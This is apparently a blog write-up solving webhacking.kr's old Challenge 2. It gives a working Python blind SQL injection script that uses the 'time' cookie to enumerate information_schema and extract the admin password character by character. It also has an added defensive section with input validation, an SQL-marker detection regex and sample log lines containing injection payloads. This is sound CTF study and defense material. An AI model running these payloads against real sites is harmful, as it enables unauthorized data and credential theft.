[ webhacking.kr ] Challenge 2 (old)

sangjun


2022. 2. 2. 13:25


Challenge source


<!--
2022-02-02 01:35:05
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->


Solution

- The comment in the source hints at admin.php.

- SQL injection does not seem to work on the login itself, so it looks like we have to recover admin's password.

- It feels like blind SQL injection.

- The only input vectors are the PHPSESSID and time cookies.

- Changing PHPSESSID logs us out, so I will try injecting SQL into the time value.

- When the condition is true the rendered time becomes 1 second; when it is false it becomes 0 seconds.

Entering 1 gives 1 second.
Entering 1=0 gives 0.

import requests
from pwn import *  # pwntools; only its `log` helper is used here

url = "https://webhacking.kr/challenge/web-02/"
cookie = {
    # the author's session; use your own PHPSESSID
    "PHPSESSID": "vinncgg3oi5pqsp06fu33k5ppp"
}


def parse_value(text):
    # The injected subquery's integer result is rendered as a time offset from
    # 2070-01-01 09:00:00, so the "MM:SS" that follows encodes it as MM*60 + SS.
    pos = text.find("2070-01-01 09:")
    if pos == -1:
        raise ValueError("timestamp not found in response")
    mm, ss = text[pos + 14:pos + 19].split(":")
    return int(mm) * 60 + int(ss)


def query_value(query):
    # Send the subquery in the time cookie and read the integer back from the page.
    cookie["time"] = query
    response = requests.get(url, cookies=cookie)
    return parse_value(response.text)


def leak_DB_CNT():
    # number of tables in the current database
    return query_value("(select count(table_name) from information_schema.tables where table_schema=database())")


def leak_DB_length():
    # length of the first table name
    return query_value("(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)")


def leak_DB_name(length=13):
    # first table name, one character per request (13 = result of leak_DB_length())
    result = ""
    for idx in range(1, length + 1):
        result += chr(query_value(f"(select ascii(substring(table_name,{idx},1)) from information_schema.tables where table_schema=database() limit 0,1)"))
    return result


def leak_column_cnt(db_name):
    query = f"(select count(column_name) from information_schema.columns where table_name='{db_name}')"
    log.info(f"payload = {query}")
    return query_value(query)


def leak_column_length(db_name):
    # limit 0,1 keeps the subquery scalar if the table ever has more than one column
    query = f"(select length(column_name) from information_schema.columns where table_name='{db_name}' limit 0,1)"
    log.info(f"payload = {query}")
    return query_value(query)


def leak_column_name(db_name, length=2):
    # column name, one character per request (2 = result of leak_column_length())
    result = ""
    for i in range(1, length + 1):
        result += chr(query_value(f"(select ascii(substring(column_name,{i},1)) from information_schema.columns where table_name='{db_name}' limit 0,1)"))
    return result


def leak_pw_length():
    query = "(select length(pw) from admin_area_pw)"
    log.info(f"payload = {query}")
    return query_value(query)


def leak_pw(length=17):
    # admin password, one character per request (17 = result of leak_pw_length())
    result = ""
    for i in range(1, length + 1):
        result += chr(query_value(f"(select ascii(substring(pw,{i},1)) from admin_area_pw)"))
    return result


log.critical(f"[+] leak DB CNT: {leak_DB_CNT()}")
log.critical(f"[+] leak DB length: {leak_DB_length()}")
db_Name = leak_DB_name()
log.critical(f"[+] leak DB NAME: {db_Name}")
log.critical(f"[+] leak column cnt: {leak_column_cnt(db_Name)}")
log.critical(f"[+] leak column length: {leak_column_length(db_Name)}")
log.critical(f"[+] leak column name: {leak_column_name(db_Name)}")
log.critical(f"[+] leak pw length: {leak_pw_length()}")
print(leak_pw())
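As an added defender-side example (not part of this writeup or the challenge's own code), the Python below shows the fix for this input vector and a log check for it: the time cookie is accepted only as a bounded integer before any query is built, and access-log lines whose time cookie carries SQL syntax are flagged. The log format, the names safe_time_offset, classify_cookie and flag_time_cookie, and the bound MAX_OFFSET are assumptions; the sample log lines are constructed.

```python
import re
# Assumed server-side bound on a legitimate "time" offset (one day in seconds).
MAX_OFFSET = 24 * 60 * 60

def safe_time_offset(raw):
    """Accept the time cookie only as a plain bounded integer; otherwise None.
    This is the fix: an int can be bound to the query, never concatenated."""
    if raw is None or not re.fullmatch(r"-?\d{1,6}", raw):
        return None
    value = int(raw)
    return value if 0 <= value <= MAX_OFFSET else None

# Markers used by the extraction script above: information_schema subqueries,
# ascii()/substring()/length(), parentheses, quotes and comparison operators.
SQL_MARKERS = re.compile(
    r"\b(select|from|where|information_schema|substring|ascii|length|limit|union)\b"
    r"|[()'\"=]",
    re.IGNORECASE,
)

def classify_cookie(raw):
    """'ok' for a valid offset, 'sqli' when SQL syntax is present, else 'malformed'."""
    if safe_time_offset(raw) is not None:
        return "ok"
    if SQL_MARKERS.search(raw or ""):
        return "sqli"
    return "malformed"

# Constructed access-log lines; the format (ip - - "request" status "cookies") is assumed.
SAMPLE_LOG = """\
203.0.113.5 - - "GET /challenge/web-02/" 200 "PHPSESSID=abc; time=1"
203.0.113.5 - - "GET /challenge/web-02/" 200 "PHPSESSID=abc; time=(select count(table_name) from information_schema.tables where table_schema=database())"
198.51.100.9 - - "GET /challenge/web-02/" 200 "PHPSESSID=def; time=1=0"
198.51.100.9 - - "GET /challenge/web-02/" 200 "PHPSESSID=def; time=(select ascii(substring(pw,1,1)) from admin_area_pw)"
"""

TIME_COOKIE = re.compile(r"time=([^\";]*)")

def flag_time_cookie(log_text):
    """Return (line_no, verdict, cookie_value) for every line whose time cookie is not 'ok'."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = TIME_COOKIE.search(line)
        if m and (verdict := classify_cookie(m.group(1))) != "ok":
            hits.append((n, verdict, m.group(1)))
    return hits

if __name__ == "__main__":
    for n, verdict, value in flag_time_cookie(SAMPLE_LOG):
        print(f"line {n}: {verdict}: time={value}")
```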

Things to remember
1. Find the input vectors.
2. If there is no hint in the comments, try a dictionary attack once.
3. When you find SQL injection, think about how to recover the DB name and the table names.
4. Remember the information_schema.XXX tables.
5. When the XXX from item 4 is used in the WHERE clause, the trailing s is dropped (tables → table_name, columns → column_name).
6. Remember the database() function.
